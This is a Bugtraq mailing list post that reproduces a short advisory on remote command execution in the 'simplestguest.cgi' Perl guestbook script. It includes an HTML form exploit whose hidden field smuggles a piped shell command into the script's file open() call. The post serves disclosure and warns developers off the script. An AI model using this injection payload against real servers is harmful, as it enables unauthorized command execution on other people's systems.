Bugtraq mailing list archives
Re: Insecure input validation in simplestmail.cgi
From: suid () SNEAKERZ ORG
Date: Mon, 13 Dec 0100 01:14:04 +0000
simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif
Wright. The whole group of "simplest" cgi's are bad. web developers: dont use them I didnt really post this because its pretty lame but i looked at a few of these a while back and heres something i put on my site in feburary. (which used to be suid.edu and is now www.sneakerz.org/~suid/) suid () sneakerz org - mini advisory - Tammies Husband Guestbook CGI Software: simplestguest.cgi URL: http://www.conservatives.net/atheist/scripts/simplestguest.html Version: Version 2 Platforms: Unix Type: Input validation problem Summary: Anyone can execute any command on the remote system with the priveleges of the web server. Vulnerability: The perl code does no input validation and performs an open() on a user supplied input. Exploit: Build a HTML form resembling: <form action=/cgi-bin/simplestguest.cgi method=POST> <input type=hidden name=required value="NAME"> <input type=hidden name=guestbook value=" | <command goes here> |"> <input type=hidden name="NAME" value="X"> <input type=submit> </form> Of course you could simply send this in a POST request directly to the web server. Whatever. http://www.sneakerz.org/~suid/ EOF
Current thread:
- Re: Insecure input validation in simplestmail.cgi suid (Dec 14)